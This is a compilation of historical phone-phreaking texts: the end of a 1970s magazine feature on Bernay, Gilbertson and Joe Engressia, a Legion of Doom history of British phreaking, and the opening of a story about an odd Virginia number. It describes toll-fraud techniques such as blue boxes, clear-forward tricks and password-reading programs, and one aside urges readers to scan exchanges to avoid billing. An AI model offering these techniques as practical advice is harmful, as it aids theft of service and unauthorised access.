"I went all over the coast with these stickers not only on pay phones, butI'dthrow them in front of high schools in the middle of the night, I'd leavethemunobtrusively in candy stores, scatter them on main streets of small towns.Atfirst hardly anyone bothered to try it out. I would listen in for hoursandhours after six o'clock and no one came on. I couldn't figure out whypeoplewouldn't be interested. Finally these two girls in Oregon tried it out andtold all their friends and suddenly it began to spread."
Before his Johny Appleseed trip Bernay had already gathered a sizable groupofearly pre-blue-box phone phreaks together on loop-arounds in Los Angeles.Bernay does not claim credit for the original discovery of the loop-aroundnumbers. He attributes the discovery to an eighteen-year-old reform schoolkidin Long Beach whose name he forgets and who, he says, "just disappeared oneday." When Bernay himself discovered loop-arounds independently, fromclues inhis readings in old issues of the Automatic Electric Technical Journal, hefound dozens of the reform-school kid's friends already using them.However, itwas one of Bernay's disciples in Seattle that introduced phone phreaking toblind kids. The Seattle kid who learned about loops through Bernay'srecordingtold a blind friend, the blind kid taught the secret to his friends at awintercamp for blind kids in Los Angeles. When the camp session was over thesekidstook the secret back to towns all over the West. This is how the originalblind kids became phone phreaks. For them, for most phone phreaks ingeneral,
it was the discovery of the possibilities of loop-arounds which led them ontofar more serious and sophisticated phone-phreak methods, and which gavethem amedium for sharing their discoveries.
A year later a blind kid who moved back east brought the technique to ablindkids' summer camp in Vermont, which spread it along the East Coast. Allfrom aMark Bernay sticker.
Bernay, who is nearly thirty years old now, got his start when he wasfifteenand his family moved into an L.A. suburb serviced by General Telephone andElectronics equipment. He became fascinated with the differences betweenBelland G.T.&E. equipment. He learned he could make interesting things happenbycarefully timed clicks with the disengage button. He learned to interpretsubtle differences in the array of clicks, whirrs and kachinks he couldhear onhis lines. He learned he could shift himself around the switching relaysofthe L.A. area code in a not-too-predictable fashion by interspersing hisownhook-switch clicks with the clicks within the line. (Independent phonecompanies -- there are nineteen hundred of them still left, most of themtinyisland principalities in Ma Bell's vast empire -- have always beenfavoriteswith phone phreaks, first as learning tools, then as Archimedes platformsfromwhich to manipulate the huge Bell system. A phone phreak in Bell territorywill often M-F himself into an independent's switching system, withswitchingidiosyncrasies which can give him marvelous leverage over the Bell System.
"I have a real affection for Automatic Electric Equipment," Bernay told me."There are a lot of things you can play with. Things break down ininterestingways."
Shortly after Bernay graduated from college (with a double major inchemistryand philosophy), he graduated from phreaking around with G.T.&E. to theBellSystem itself, and made his legendary sticker-pasting journey north alongthecoast, settling finally in Northwest Pacific Bell territory. He discoveredthat if Bell does not break down as interestingly as G.T.&E., itneverthelessoffers a lot of "things to play with."
Bernay learned to play with blue boxes. He established his own personalswitchboard and phone-phreak research laboratory complex. He continued hisphone-phreak evangelism with ongoing sticker campaigns. He set up tworecording
numbers, one with instructions for beginning phone phreaks, the other withlatest news and technical developments (along with some advancedinstruction)gathered from sources all over the country.
These days, Bernay told me, he had gone beyond phone-phreaking itself."LatelyI've been enjoying playing with computers more than playing with phones.Mypersonal thing in computers is just like with phones, I guess -- the kickis infinding out how to beat the system, how to get at things I'm not supposedtoknow about, how to do things with the system that I'm not supposed to beableto do."
As a matter of fact, Bernay told me, he had just been fired from hiscomputer-programming job for doing things he was not supposed to be able todo.he had been working with a huge time-sharing computer owned by a largecorporation but shared by many others. Access to the computer was limitedtothose programmers and corporations that had been assigned certainpasswords.And each password restricted its user to access to only the one section ofthecomputer cordoned off from its own information storager. The passwordsystemprevented companies and individuals from stealing each other's information.
"I figured out how to write a program that would let me read everyoneelse'spassword," Bernay reports. "I began playing around with passwords. Ibeganletting the people who used the computer know, in subtle ways, that I knewtheir passwords. I began dropping notes to the computer supervisors withhintsthat I knew what I know. I signed them 'The Midnight Skulker.' I keptgettingcleverer and cleverer with my messages and devising ways of showing themwhat Icould do. I'm sure they couldn't imagine I could do the things I wasshowingthem. But they never responded to me. Every once in a while they'd changethepasswords, but I found out how to discover what the new ones were, and Iletthem know. But they never responded directly to the Midnight Skulker. Ievenfinally designed a program which they could use to prevent my program fromfinding out what it did. In effect I told them how to wipe me out, TheMidnight Skulker. It was a very clever program. I started leaving cluesaboutmyself. I wanted them to try and use it and then try to come up withsomethingto get around that and reappear again. But they wouldn't play. I wantedto
get caught. I mean I didn't want to get caught personally, but I wantedthemto notice me and admit that they noticed me. I wanted them to attempt torespond, maybe in some interesting way."Finally the computer managers became concerned enough about the threat ofinformation-stealing to respond. However, instead of using The MidnightSkulker's own elegant self-destruct program, they called in their securitypersonnel, interrogated everyone, found an informer to identify Bernay asTheMidnight Skulker, and fired him.
"At first the security people advised the company to hire me full-time tosearch out other flaws and discover other computer freaks. I might havelikedthat. But I probably would have turned into a double double agent ratherthanthe double agent they wanted. I might have resurrected The MidnightSkulkerand tried to catch myself. Who knows? Anyway, the higher-ups turned thewholeidea down."
You Can Tap the F.B.I.'s Crime Control Computer in the Comfort of Your OwnHome, Perhaps
Computer freaking may be the wave of the future. It suits the phone-phreaksensibility perfectly. Gilbertson, the blue-box inventor and a lifelongphonephreak, has also gone on from phone-phreaking to computer-freaking. Beforehegot into the blue-box business Gilbertson, who is a highly skilledprogrammer,devised programs for international currency arbitrage.
But he began playing with computers in earnest when he learned he could usehisblue box in tandem with the computer terminal installed in his apartment bytheinstrumentation firm he worked for. The print-out terminal and keyboardwasequipped with acoustical coupling, so that by coupling his little ivoryPrincess phone to the terminal and then coupling his blue box on that, hecouldM-F his way into other computers with complete anonymity, and withoutcharge;program and re-program them at will; feed them false or misleadinginformation;tap and steal from them. He explained to me that he taps computers bybusyingout all the lines, then going into a verification trunk, listening into thepasswords and instructions one of the time sharers uses, and them M-F-inginand imitating them. He believes it would not be impossible to creep intotheF.B.I's crime control computer through a local police computer terminal andphreak around with the F.B.I.'s memory banks. He claims he has succeededinre-programming a certain huge institutional computer in such a way that it
hascordoned off an entire section of its circuitry for his personal use, andatthe same time conceals that arrangement from anyone else's notice. I havebeenunable to verify this claim.
Like Captain Crunch, like Alexander Graham Bell (pseudonym of adisgruntled-looking East Coast engineer who claims to have invented theblackbox and now sells black and blue boxes to gamblers and radical heavies),likemost phone phreaks, Gilbertson began his career trying to rip off payphones asa teenager. Figure them out, then rip them off. Getting his dime backfromthe pay phone is the phone phreak's first thrilling rite of passage. Afterlearning the usual eighteen different ways of getting his dime back,Gilbertsonlearned how to make master keys to coin-phone cash boxes, and get everyoneelse's dimes back. He stole some phone-company equipment and put togetherhisown home switchboard with it. He learned to make a simple "bread-box"device,of the kind used by bookies in the Thirties (bookie gives a number to hisbetting clients; the phone with that number is installed in some widowlady'sapartment, but is rigged to ring in the bookie's shop across town, copstracebig betting number and find nothing but the widow).
Not long after that afternoon in 1968 when, deep in the stacks of anengineering library, he came across a technical journal with the phone tonefrequencies and rushed off to make his first blue box, not long after thatGilbertson abandoned a very promising career in physical chemistry andbeganselling blue boxes for $1,500 apiece.
"I had to leave physical chemistry. I just ran out of interesting thingstolearn," he told me one evening. We had been talking in the apartment oftheman who served as the link between Gilbertson and the syndicate inarrangingthe big $300,000 blue-box deal which fell through because of legal trouble.There has been some smoking.
"No more interesting things to learn," he continues. "Physical chemistryturnsout to be a sick subject when you take it to its highest level. I don'tknow.I don't think I could explain to you how it's sick. You have to be there.Butyou get, I don't know, a false feeling of omnipotence. I suppose it's likephone-phreaking that way. This huge thing is there. This whole system.Andthere are holes in it and you slip into them like Alice and you'repretending
you're doing something you're actually not, or at least it's no longer youthat's doing what you thought you were doing. It's all Lewis Carroll.Physical chemistry and phone-phreaking. That's why you have thesephone-phreakpseudonyms like The Cheshire Cat, the Red King, and The Snark. But there'ssomething about phone-phreaking that you don't find in physical chemistry."Helooks up at me:
"Did you ever steal anything?"
"Well yes, I..."
"Then you know! You know the rush you get. It's not just knowledge, likephysical chemistry. It's forbidden knowledge. You know. You can learnaboutanything under the sun and be bored to death with it. But the idea thatit'sillegal. Look: you can be small and mobile and smart and you're rippingoffsomebody large and powerful and very dangerous."
People like Gilbertson and Alexander Graham Bell are always talking aboutripping off the phone company and screwing Ma Bell. But if they were shownasingle button and told that by pushing it they could turn the entirecircuitryof A.T.&T. into molten puddles, they probably wouldn't push it. Thedisgruntled-inventor phone phreak needs the phone system the way the lapsedCatholic needs the Church, the way Satan needs a God, the way The MidnightSkulker needed, more than anything else, response.
Later that evening Gilbertson finished telling me how delighted he was attheflood of blue boxes spreading throughout the country, how delighted he wastoknow that "this time they're really screwed." He suddenly shifted gears.
"Of course. I do have this love/hate thing about Ma Bell. In a way Ialmostlike the phone company. I guess I'd be very sad if they were todisintegrate.In a way it's just that after having been so good they turn out to havethesethings wrong with them. It's those flaws that allow me to get in and messwiththem, but I don't know. There's something about it that gets to you andmakesyou want to get to it, you know."
I ask him what happens when he runs out of interesting, forbidden things tolearn about the phone system.
"I don't know, maybe I'd go to work for them for a while."
"In security even?"
"I'd do it, sure. I just as soon play -- I'd just as soon work on either
side."
"Even figuring out how to trap phone phreaks? I said, recalling MarkBernay'sgame."
"Yes, that might be interesting. Yes, I could figure out how to outwit thephone phreaks. Of course if I got too good at it, it might become boringagain. Then I'd have to hope the phone phreaks got much better andoutsmartedme for a while. That would move the quality of the game up one level. Imighteven have to help them out, you know, 'Well, kids, I wouldn't want this togetaround but did you ever think of -- ?' I could keep it going at higher andhigher levels forever."
The dealer speaks up for the first time. He has been staring at the softblinking patterns of light and colors on the translucent tiled wall facinghim.(Actually there are no patterns: the color and illumination of every tileisdetermined by a computerized random-number generator designed by Gilbertsonwhich insures that there can be no meaning to any sequence of events in thetiles.)
"Those are nice games you're talking about," says the dealer to his friend."But I wouldn't mind seeing them screwed. A telephone isn't privateanymore.You can't say anything you really want to say on a telephone or you have togothrough that paranoid bullshit. 'Is it cool to talk on the phone?' I mean,even if it is cool, if you have to ask 'Is it cool,' then it isn't cool.Youknow. 'Is it cool,' then it isn't cool. You know. Like those blind kids,people are going to start putting together their own private telephonecompanies if they want to really talk. And you know what else. You don'thearsilences on the phone anymore. They've got this time-sharing thing onlong-distance lines where you make a pause and they snip out that piece oftimeand use it to carry part of somebody else's conversation. Instead of apause,where somebody's maybe breathing or sighing, you get this blank hole andyouonly start hearing again when someone says a word and even the beginning oftheword is clipped off. Silences don't count -- you're paying for them, buttheytake them away from you. It's not cool to talk and you can't hear someonewhenthey don't talk. What the hell good is the phone? I wouldn't mind seeingthemtotally screwed."
The Big Memphis Bust
Joe Engressia never wanted to screw Ma Bell. His dream had always been to
workfor her.
The day I visited Joe in his small apartment on Union Avenue in Memphis, hewasupset about another setback in his application for a telephone job.
"They're stalling on it. I got a letter today telling me they'd have topostpone the interview I requested again. My landlord read it for me.Theygave me some runaround about wanting papers on my rehabilitation status butIthink there's something else going on."
When I switched on the 40-watt bulb in Joe's room -- he sometimes forgetswhenhe has guests -- it looked as if there was enough telephone hardware tostart asmall phone company of his own.
There is one phone on top of his desk, one phone sitting in an open drawerbeneath the desk top. Next to the desk-top phone is a cigar-box-size M-Fdevice with big toggle switches, and next to that is some kind of switchingandcoupling device with jacks and alligator plugs hanging loose. Next to thatisa Braille typewriter. On the floor next to the desk, lying upside downlike adead tortoise, is the half-gutted body of an old black standard phone.Acrossthe room on a torn and dusty couch are two more phones, one of them atouch-tone model; two tape recorders; a heap of phone patches andcassettes,and a life-size toy telephone.
Our conversation is interrupted every ten minutes by phone phreaks from allover the country ringing Joe on just about every piece of equipment but thetoyphone and the Braille typewriter. One fourteen-year-old blind kid fromConnecticut calls up and tells Joe he's got a girl friend. He wants totalk toJoe about girl friends. Joe says they'll talk later in the evening whentheycan be alone on the line. Joe draws a deep breath, whistles him off theairwith an earsplitting 2600-cycle whistle. Joe is pleased to get the callsbut helooked worried and preoccupied that evening, his brow constantly furrowedoverhis dark wandering eyes. In addition to the phone-company stall, he hasjustlearned that his apartment house is due to be demolished in sixty days forurban renewal. For all its shabbiness, the Union Avenue apartment househasbeen Joe's first home-of-his-own and he's worried that he may not findanotherbefore this one is demolished.
But what really bothers Joe is that switchmen haven't been listening tohim."I've been doing some checking on 800 numbers lately, and I've discoveredthatcertain 800 numbers in New Hampshire couldn't be reached from Missouri andKansas. Now it may sound like a small thing, but I don't like to seesloppywork; it makes me feel bad about the lines. So I've been calling upswitchingoffices and reporting it, but they haven't corrected it. I called them upforthe third time today and instead of checking they just got mad. Well, thatgets me mad. I mean, I do try to help them. There's something about themIcan't understand -- you want to help them and they just try to say you'redefrauding them."
It is Sunday evening and Joe invites me to join him for dinner at a HolidayInn. Frequently on Sunday evening Joe takes some of his welfare money,calls acab, and treats himself to a steak dinner at one of Memphis' thirteenHolidayInns. (Memphis is the headquarters of Holiday Inn. Holiday Inns have beenafavorite for Joe ever since he made his first solo phone trip to a Bellswitching office in Jacksonville, Florida, and stayed in the Holiday Innthere.He likes to stay at Holiday Inns, he explains, because they representfreedomto him and because the rooms are arranged the same all over the country soheknows that any Holiday Inn room is familiar territory to him. Just likeanytelephone.)
Over steaks in the Pinnacle Restaurant of the Holiday Inn Medical Center onMadison Avenue in Memphis, Joe tells me the highlights of his life as aphonephreak.
At age seven, Joe learned his first phone trick. A mean baby-sitter, tiredoflistening to little Joe play with the phone as he always did, constantly,put alock on the phone dial. "I got so mad. When there's a phone sitting thereandI can't use it... so I started getting mad and banging the receiver up anddown. I noticed I banged it once and it dialed one. Well, then I triedbanging it twice...." In a few minutes Joe learned how to dial by pressingthehook switch at the right time. "I was so excited I remember going 'whoowhoo'and beat a box down on the floor."
At age eight Joe learned about whistling. "I was listening to someinterceptnon working-number recording in L.A.- I was calling L.A. as far back asthat,
but I'd mainly dial non working numbers because there was no charge, andI'dlisten to these recordings all day. Well, I was whistling 'cause listeningtothese recordings can be boring after a while even if they are from L.A.,andall of a sudden, in the middle of whistling, the recording clicked off. Ifiddled around whistling some more, and the same thing happened. So Icalledup the switch room and said, 'I'm Joe. I'm eight years old and I want toknowwhy when I whistle this tune the line clicks off.' He tried to explain ittome, but it was a little too technical at the time. I went on learning.Thatwas a thing nobody was going to stop me from doing. The phones were mylife,and I was going to pay any price to keep on learning. I knew I could go tojail. But I had to do what I had to do to keep on learning."
The phone is ringing when we walk back into Joe's apartment on UnionAvenue.It is Captain Crunch. The Captain has been following me around by phone,calling up everywhere I go with additional bits of advice and explanationforme and whatever phone phreak I happen to be visiting. This time theCaptainreports he is calling from what he describes as "my hideaway high up in theSierra Nevada." He pulses out lusty salvos of M-F and tells Joe he isabout to"go out and get a little action tonight. Do some phreaking of anotherkind, ifyou know what I mean." Joe chuckles.
The Captain then tells me to make sure I understand that what he told meabouttying up the nation's phone lines was true, but that he and the phonephreakshe knew never used the technique for sabotage. They only learned thetechniqueto help the phone company.
"We do a lot of troubleshooting for them. Like this New Hampshire/MissouriWATS-line flaw I've been screaming about. We help them more than theyknow."
After we say good-bye to the Captain and Joe whistles him off the line, Joetells me about a disturbing dream he had the night before: "I had beencaughtand they were taking me to a prison. It was a long trip. They were takingmeto a prison a long long way away. And we stopped at a Holiday Inn and itwasmy last night ever using the phone and I was crying and crying, and thelady atthe Holiday Inn said, 'Gosh, honey, you should never be sad at a HolidayInn.You should always be happy here. Especially since it's your last night.'
Andthat just made it worse and I was sobbing so much I couldn't stand it."
Two weeks after I left Joe Engressia's apartment, phone-company securityagentsand Memphis police broke into it. Armed with a warrant, which they leftpinnedto a wall, they confiscated every piece of equipment in the room, includinghistoy telephone. Joe was placed under arrest and taken to the city jailwhere hewas forced to spend the night since he had no money and knew no one inMemphisto call.
It is not clear who told Joe what that night, but someone told him that thephone company had an open-and-shut case against him because of revelationsofillegal activity he had made to a phone-company undercover agent.
By morning Joe had become convinced that the reporter from Esquire, withwhomhe had spoken two weeks ago, was the undercover agent. He probably haduglythoughts about someone he couldn't see gaining his confidence, listening tohimtalk about his personal obsessions and dreams, while planning all the whiletolock him up.
"I really thought he was a reporter," Engressia told the MemphisPress-Seminar."I told him everything...." Feeling betrayed, Joe proceeded to confesseverything to the press and police.
As it turns out, the phone company did use an undercover agent to trap Joe,although it was not the Esquire reporter.
Ironically, security agents were alerted and began to compile a caseagainstJoe because of one of his acts of love for the system: Joe had called aninternal service department to report that he had located a group ofdefectivelong-distance trunks, and to complain again about the NewHampshire/MissouriWATS problem. Joe always liked Ma Bell's lines to be clean and responsive.Asuspicious switchman reported Joe to the security agents who discoveredthatJoe had never had a long-distance call charged to his name.
Then the security agents learned that Joe was planning one of his phonetripsto a local switching office. The security people planted one of theiragentsin the switching office. He posed as a student switchman and followed Joearound on a tour. He was extremely friendly and helpful to Joe, leadinghim
around the office by the arm. When the tour was over he offered Joe a ridebackto his apartment house. On the way he asked Joe -- one tech man to another--about "those blue boxers" he'd heard about. Joe talked about them freely,talked about his blue box freely, and about all the other things he coulddowith the phones.
The next day the phone-company security agents slapped a monitoring tape onJoe's line, which eventually picked up an illegal call. Then they appliedforthe search warrant and broke in.
In court Joe pleaded not guilty to possession of a blue box and theft ofservice. A sympathetic judge reduced the charges to malicious mischief andfound him guilty on that count, sentenced him to two thirty-day sentencesto beserved concurrently and then suspended the sentence on condition that Joepromise never to play with phones again. Joe promised, but the phonecompanyrefused to restore his service. For two weeks after the trial Joe couldnot bereached except through the pay phone at his apartment house, and thelandlordscreened all calls for him.
Phone-phreak Carl managed to get through to Joe after the trial, andreportedthat Joe sounded crushed by the whole affair.
"What I'm worried about," Carl told me, "is that Joe means it this time.Thepromise. That he'll never phone-phreak again. That's what he told me,thathe's given up phone-phreaking for good. I mean his entire life. He saysheknows they're going to be watching him so closely for the rest of his lifehe'll never be able to make a move without going straight to jail. Hesoundedvery broken up by the whole experience of being in jail. It was awful tohearhim talk that way. I don't know. I hope maybe he had to sound that way.Overthe phone, you know."
He reports that the entire phone-phreak underground is up in arms over thephone company's treatment of Joe. "All the while Joe had his hopes pinnedonhis application for a phone-company job, they were stringing him alonggettingready to bust him. That gets me mad. Joe spent most of his time helpingthemout. The bastards. They think they can use him as an example. All ofsuddenthey're harassing us on the coast. Agents are jumping up on our lines.Theyjust busted ------'s mute yesterday and ripped out his lines. But no
matterwhat Joe does, I don't think we're going to take this lying down."
Two weeks later my phone rings and about eight phone phreaks in successionsayhello from about eight different places in the country, among them Carl,Ed,and Captain Crunch. A nationwide phone-phreak conference line has beenreestablished through a switching machine in --------, with the cooperationofa disgruntled switchman.
"We have a special guest with us today," Carl tells me.
The next voice I hear is Joe's. He reports happily that he has just movedto aplace called Millington, Tennessee, fifteen miles outside of Memphis, wherehehas been hired as a telephone-set repairman by a small independent phonecompany. Someday he hopes to be an equipment troubleshooter.
"It's the kind of job I dreamed about. They found out about me from thepublicity surrounding the trial. Maybe Ma Bell did me a favor busting me.I'll have telephones in my hands all day long."
"You know the expression, 'Don't get mad, get even'?" phone-phreak Carlaskedme. "Well, I think they're going to be very sorry about what they did toJoeand what they're trying to do to us."
(an excellent story presented here by Jolly Roger. Taken from the Official Hacker's Guide. Originally seen by myself in some book and I cannot remember the name of it.)

-->Courtesy of the Jolly Roger<--
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ THE HISTORY OF BRITISH PHREAKING $ $ -=- -=-=-=- -- -=-=-=- -=-=-=-=- $ $ $ $ THE SECOND IN A SERIES OF $ $ THE HISTORY OF.....PHILES $ $ $ $ WRITTEN AND UPLOADED BY: $ $ $ $$$$$$$$$$$$-=>LEX LUTHOR<=-$$$$$$$$$$$ $ AND $ $ THE LEGION OF DOOM! $ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
NOTE: THE BRITISH POST OFFICE, IS THE U.S. EQUIVALENT OF MA BELL.
IN BRITAIN, PHREAKING GOES BACK TO THE EARLY FIFTIES, WHEN THE TECHNIQUE
OF'TOLL A DROP BACK' WAS DISCOVERED. TOLL A WAS AN EXCHANGE NEAR ST. PAULSWHICH ROUTED CALLS BETWEEN LONDON AND NEARBY NON-LONDON EXCHANGES. THETRICKWAS TO DIAL AN UNALLOCATED NUMBER, AND THEN DEPRESS THE RECEIVER-REST FOR1/2SECOND. THIS FLASHING INITIATED THE 'CLEAR FORWARD' SIGNAL, LEAVING THECALLERWITH AN OPEN LINE INTO THE TOLL A EXCHANGE.THE COULD THEN DIAL 018, WHICHFORWARDED HIM TO THE TRUNK EXCHANGE AT THAT TIME, THE FIRST LONG DISTANCEEXCHANGE IN BRITAIN AND FOLLOW IT WITH THE CODE FOR THE DISTANT EXCHANGE TOWHICH HE WOULD BE CONNECTED AT NO EXTRA CHARGE.
THE SIGNALS NEEDED TO CONTROL THE UK NETWORK TODAY WERE PUBLISHED IN THE"INSTITUTION OF POST OFFICE ENGINEERS JOURNAL" AND REPRINTED IN THE SUNDAYTIMES (15 OCT. 1972).
THE SIGNALLING SYSTEM THEY USE: SIGNALLING SYSTEM NO. 3 USES PAIRS OFFREQUENCIES SELECTED FROM 6 TONES SEPARATED BY 120HZ. WITH THAT INFO, THEPHREAKS MADE "BLEEPERS" OR AS THEY ARE CALLED HERE IN THE U.S. "BLUE BOX",BUTTHEY DO UTILIZE DIFFERENT MF TONES THEN THE U.S., THUS, YOUR U.S. BLUE BOXTHAT YOU SMUGGLED INTO THE UK WILL NOT WORK, UNLESS YOU CHANGE THEFREQUENCIES.
IN THE EARLY SEVENTIES, A SIMPLER SYSTEM BASED ON DIFFERENT NUMBERS OFPULSESWITH THE SAME FREQUENCY (2280HZ) WAS USED. FOR MORE INFO ON THAT, TRY TOGET AHOLD OF: ATKINSON'S "TELEPHONY AND SYSTEMS TECHNOLOGY".
IN THE EARLY DAYS OF BRITISH PHREAKING, THE CAMBRIDGE UNIVERSITY TITANCOMPUTER WAS USED TO RECORD AND CIRCULATE NUMBERS FOUND BY THE EXHAUSTIVEDIALING OF LOCAL NETWORKS. THESE NUMBERS WERE USED TO CREATE A CHAIN OFLINKSFROM LOCAL EXCHANGE TO LOCAL EXCHANGE ACROSS THE COUNTRY, BYPASSING THETRUNKCIRCUITS. BECAUSE THE INTERNAL ROUTING CODES IN THE UK NETWORK ARE NOT THESAME AS THOSE DIALED BY THE CALLER, THE PHREAKS HAD TO DISCOVER THEM BY'PROBEAND LISTEN' TECHNIQUES OR MORE COMMONLY KNOWN IN THE U.S.-- SCANNING. WHATTHEY DID WAS PUT IN LIKELY SIGNALS AND LISTENED TO FIND OUT IF THEYSUCCEEDED.THE RESULTS OF SCANNING WERE CIRCULATED TO OTHER PHREAKS. DISCOVERING EACHOTHER TOOK TIME AT FIRST, BUT EVENTUALLY THE PHREAKS BECAME ORGANIZED. THE"TAP" OF BRITAIN WAS CALLED "UNDERCURRENTS" WHICH ENABLED BRITISH PHREAKSTOSHARE THE INFO ON NEW NUMBERS, EQUIPMENT ETC.
TO UNDERSTAND WHAT THE BRITISH BRITISH PHREAKS DID, THINK OF THE PHONENETWORK IN THREE LAYERS OF LINES: LOCAL, TRUNK, AND INTERNATIONAL.#IN THEUK,SUBSCRIBER TRUNK DIALING (STD), IS THE MECHANISM WHICH TAKES A CALL FROMTHELOCAL LINES AND (LEGITIMATELY) ELEVATES IT TO A TRUNK OR INTERNATIONALLEVEL.#THE UK PHREAKS FIGURED THAT A CALL AT TRUNK LEVEL CAN BE ROUTEDTHROUGHANY NUMBER OF EXCHANGES, PROVIDED THAT THE RIGHT ROUTING CODES WERE FOUND
ANDUSED CORRECTLY. THEY ALSO HAD TO DISCOVER HOW TO GET FROM LOCAL TO TRUNKLEVELEITHER WITHOUT BEING CHARGED (WHICH THEY DID WITH A BLEEPER BOX) OR WITHOUTUSING (STD). CHAINING HAS ALREADY BEEN MENTIONED BUT IT REQUIRES LONGSTRINGSOF DIGITS AND SPEECH GETS MORE AND MORE FAINT AS THE CHAIN GROWS, JUST LIKEITDOES WHEN YOU STACK TRUNKS BACK AND FORTH ACROSS THE U.S.#THE WAY THESECURITYREPS SNAGGED THE PHREAKS WAS TO PUT A SIMPLE 'PRINTERMETER' OR AS WE CALLIT:A PEN REGISTER ON THE SUSPECTS LINE, WHICH SHOWS EVERY DIGIT DIALED FROMTHESUBSCRIBERS LINE.
THE BRITISH PREFER TO GET ONTO THE TRUNKS RATHER THAN CHAINING. ONE WAYWASTO DISCOVER WHERE LOCAL CALLS USE THE TRUNKS BETWEEN NEIGHBORING EXCHANGES,START A CALL AND STAY ON THE TRUNK INSTEAD OF RETURNING TO THE LOCAL LEVELONREACHING THE DISTANT SWITCH. THIS AGAIN REQUIRED EXHAUSTIVE DIALING ANDMADEMORE WORK FOR TITAN; IT ALSO REVEALED 'FIDDLES', WHICH WERE INSERTED BYPOSTOFFICE ENGINEERS.
WHAT FIDDLING MEANS IS THAT THE ENGINEERS REWIRED THE EXCHANGES FOR THEIROWNBENEFIT. THE EQUIPMENT IS MODIFIED TO GIVE ACCESS TO A TRUNK WITH OUTBEINGCHARGED, AN OPERATION WHICH IS PRETTY EASY IN STEP BY STEP (SXS)ELECTROMECHANICAL EXCHANGES, WHICH WERE INSTALLED IN BRITAIN EVEN IN THE1970S(NOTE: I KNOW OF A BACK DOOR INTO THE CANADIAN SYSTEM ON A 4A CO., SO IFYOUARE ON SXS OR A 4A, TRY SCANNING 3 DIGIT EXCHANGES, IE: DIAL 999,998,997ETC.#AND LISTEN FOR THE BEEP-KERCHINK, IF THERE ARE NO 3 DIGIT CODES WHICHALLOW DIRECT ACCESS TO A TANDEM IN YOUR LOCAL EXCHANGE AND BYPASSES THE AMASOYOU WON'T BE BILLED, NOT HAVE TO BLAST 2600 EVERY TIME YOU WISH TO BOX ACALL.
A FAMOUS BRITISH 'FIDDLER' REVEALED IN THE EARLY 1970S WORKED BY DIALING173.THE CALLER THEN ADDED THE TRUNK CODE OF 1 AND THE SUBSCRIBERS LOCAL NUMBER.ATTHAT TIME, MOST ENGINEERING TEST SERVICES BEGAN WITH 17X, SO THE ENGINEERSCOULD HIDE THEIR FIDDLES IN THE NEST OF SERVICE WIRES. WHEN SECURITY REPSSTARTED SEARCHING, THE FIDDLES WERE CONCEALED BY TONES SIGNALLING: 'NUMBERUNOBTAINALBE' OR 'EQUIPMENT ENGAGED' WHICH SWITCHED OFF AFTER A DELAY. THENECESSARY RELAYS ARE SMALL AND EASILY HIDDEN.
THERE WAS ANOTHER SIDE TO PHREAKING IN THE UK IN THE SIXTIES. BEFORE STDWASWIDESPREAD, MANY 'ORDINARY' PEOPLE WERE DRIVEN TO.
OCCASIONAL PHREAKING FROM SHEER FRUSTRATION AT THE INEFFICIENT OPERATOR
CONTROLLED TRUNK SYSTEM. THIS CAME TO A HEAD DURING A STRIKE ABOUT 1961WHENOPERATORS COULD NOT BE REACHED. NOTHING COMPLICATED WAS NEEDED. MANYOPERATORS HAD BEEN IN THE HABIT OF REPEATING THE CODES AS THEY DIALLED THEREQUESTED NUMBERS SO PEOPLE SOON LEARNT THE NUMBERS THEY CALLED FREQUENTLY.THE ONLY 'TRICK' WAS TO KNOW WHICH EXCHANGES COULD BE DIALLED THROUGH TOPASSON THE TRUNK NUMBER.CALLERS ALSO NEEDED A PRETTY QUIET PLACE TO DO IT,SINCETIMING RELATIVE TO CLICKS WAS IMPORTANT THE MOST FAMOUS TRIAL OF BRITISHPHREAKS WAS CALLED THE OLD BAILY TRIAL.#WHICH STARTED ON 3 OCT. 1973.#WHATTHEY PHREAKS DID WAS TO DIAL A SPARE NUMBER AT A LOCAL CALL RATE BUTINVOLVINGA TRUNK TO ANOTHER EXCHANGE THEN THEY SEND A 'CLEAR FORWARD' TO THEIR LOCALEXCHANGE, INDICATING TO IT THAT THE CALL IS FINISHED;BUT THE DISTANTEXCHANGEDOESN'T REALIZE BECAUSE THE CALLER'S PHONE IS STILL OFF THE HOOK. THEY NOWHAVE AN OPEN LINE INTO THE DISTANT TRUNK EXCHANGE AND SENDS TO IT A 'SEIZE'SIGNAL: '1' WHICH PUTS HIM ONTO ITS OUTGOING LINES NOW, IF THEY KNOW THECODES, THE WORLD IS OPEN TO THEM. ALL OTHER EXCHANGES TRUST HIS LOCALEXCHANGETO HANDLE THE BILLING; THEY JUST INTERPRET THE TONES THEY HEAR. MEANWHILE,THE LOCAL EXCHANGE COLLECTS ONLY FOR A LOCAL CALL. THE INVESTIGATORSDISCOVERED THE PHREAKS HOLDING A CONFERENCE SOMEWHERE IN ENGLAND SURROUNDEDBYVARIOUS PHONE EQUIPMENT AND BLEEPER BOXES, ALSO PRINTOUTS LISTING 'SECRET'POSTOFFICE CODES. (THEY PROBABLY GOT THEM FROM TRASHING?) THE JUDGE SAID:"SOMETAKE TO HEROIN, SOME TAKE TO TELEPHONES" FOR THEM PHONE PHREAKING WAS NOT ACRIME BUT A HOBBY TO BE SHARED WITH PHELLOW ENTHUSIASTS AND DISCUSSED WITHTHEPOST OFFICE OPENLY OVER DINNER AND BY MAIL. THEIR APPROACH AND ATTITUDE TOTHEWORLDS LARGEST COMPUTER, THE GLOBAL TELEPHONE SYSTEM, WAS THAT OFSCIENTISTSCONDUCTING EXPERIMENTS OR PROGRAMMERS AND ENGINEERS TESTING PROGRAMS ANDSYSTEMS. THE JUDGE APPEARED TO AGREE, AND EVEN ASKED THEM FOR PHREAKINGCODESTO USE FROM HIS LOCAL EXCHANGE!!!
(Left Untouched as I got it...-----JR)

-------->Courtesy of The Jolly Roger<--------
Bad as Shit
Recently, a telephone fanatic in the northwest made an interestingdiscovery. He was exploring the 804 area code (Virginia) and found outthatthe 840 exchange did something strange. In the vast majority of cases, in fact in all of the cases except one, hewould get a recording as if the exchange didn't exist. However, if hedialed804-840 and four rather predictable numbers, he got a ring!
‡ After one or two rings, somebody picked up. Being experienced at thiskindof thing, he could tell that the call didn't "supe", that is, no chargeswerebeing incurred for calling this number. (Calls that get you to an error message, or a special operator, generallydon't supervise.) A female voice, with a hint of a Southern accent said,"Operator, can I help you?"
"Yes," he said, "What number have I reached?"
"What number did you dial, sir?"
He made up a number that was similar.
"I'm sorry that is not the number you reached." Click.
